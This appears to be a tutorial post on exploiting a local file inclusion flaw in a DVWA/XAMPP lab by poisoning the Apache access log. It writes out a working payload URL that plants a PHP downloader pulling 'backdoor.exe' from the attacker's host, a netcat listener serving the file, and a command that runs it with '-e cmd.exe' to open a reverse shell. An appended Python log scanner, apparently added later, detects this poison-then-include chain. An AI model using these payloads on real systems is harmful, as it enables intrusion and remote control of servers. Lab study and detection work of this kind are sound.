PHP script downloader and Reverse Shell with Netcat



Let's say that your server has an LFI vulnerability, or that the attacker could upload an evil PHP script to your web server. In this case I will explore the first condition, which is LFI. Let's create a slightly more difficult scenario for the attacker and something more secure for the victim :)
The web server is a Windows 7 machine running XAMPP, but it has one small misconfiguration that can be disastrous for a web server. The admin forgot to disable the register_globals and allow_url variables in the php.ini file, which allows an attacker to include a local or remote file in running PHP code.


The attacker sends this code to the web server's log file through Netcat






On the victim's machine we can see how the previous request was saved in the log file





Now the attacker visits the victim's vulnerable web page with his browser





A Linux web server has these tools preinstalled: wget, nc, sbd, ncat. But what about Windows? I leave it as an exercise for you to do your own research into other ways that can give a reverse shell. The attacker wants to download netcat from his server and execute it. The following script downloads the file from the attacker's server:

http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'192.168.1.6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php


The attacker uses a netcat listener to upload his file, but first uses upx to compress netcat.

nc -nlvp 8888 < nc.exe



Reverse Shell

After a successful download, it is time for the attacker to execute his backdoor and get a remote shell. He sets up a new listener on port 7777:


Attacker's Box  -> nc -nlvp 7777



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.6+7777+-e+cmd.exe
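From the defender's side, both halves of this chain leave traces in the same access.log: first a request that writes a literal PHP open tag into the log, then a request whose parameter points back at that log file. The following is an added example, not code from the original post; it assumes Apache's common log format, the finding names are hypothetical labels, and the sample lines are constructed with placeholder payloads.

```python
import re
from urllib.parse import parse_qsl

# Apache access-log line: host ident user [time] "request line" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(.*?)" (\d{3}) ')
# Match the raw line: only a literal (not URL-encoded) tag runs on include().
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
LOG_PATH_RE = re.compile(r'(^|/)logs?/|\.log$')

def normalise(value):
    # Unify separators (Apache writes a backslash as two) and lower-case.
    return re.sub(r'/+', '/', value.replace('\\', '/')).lower()

def inspect(line):
    """Return the set of findings for one access-log line."""
    findings = set()
    if PHP_TAG_RE.search(line):
        findings.add('php-tag-in-log')
    m = LINE_RE.match(line)
    if not m:
        return findings
    # Drop the method and trailing protocol token; the target may hold spaces.
    target = re.sub(r'^\S+ | HTTP/[\d.]+$', '', m.group(2))
    query = target.partition('?')[2]
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if LOG_PATH_RE.search(normalise(value)):
            findings.add('param-points-at-log')
    return findings

def scan(lines):
    """Return [(line_no, host, sorted findings)] for suspicious lines."""
    results, poisoned = [], False
    for no, line in enumerate(lines, 1):
        findings = inspect(line)
        # An include of a log file after a tag was written is the full chain.
        if poisoned and 'param-points-at-log' in findings:
            findings.add('poison-then-include-chain')
        poisoned = poisoned or 'php-tag-in-log' in findings
        if findings:
            results.append((no, line.split(' ', 1)[0], sorted(findings)))
    return results

# Constructed sample lines (documentation addresses, placeholder payloads).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1523',
    r'192.0.2.66 - - [01/Jan/2024:10:01:00 +0000] "GET /<?php /* constructed placeholder */ ?> HTTP/1.1" 404 1201',
    r'192.0.2.66 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=C:\\xampp\\apache\\logs\\access.log&cmd=placeholder HTTP/1.1" 200 5120',
    r'192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 900',
]
```

Calling scan(SAMPLE_LOG) reports the poisoning request and the later include of the log file, and leaves the two ordinary requests alone.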
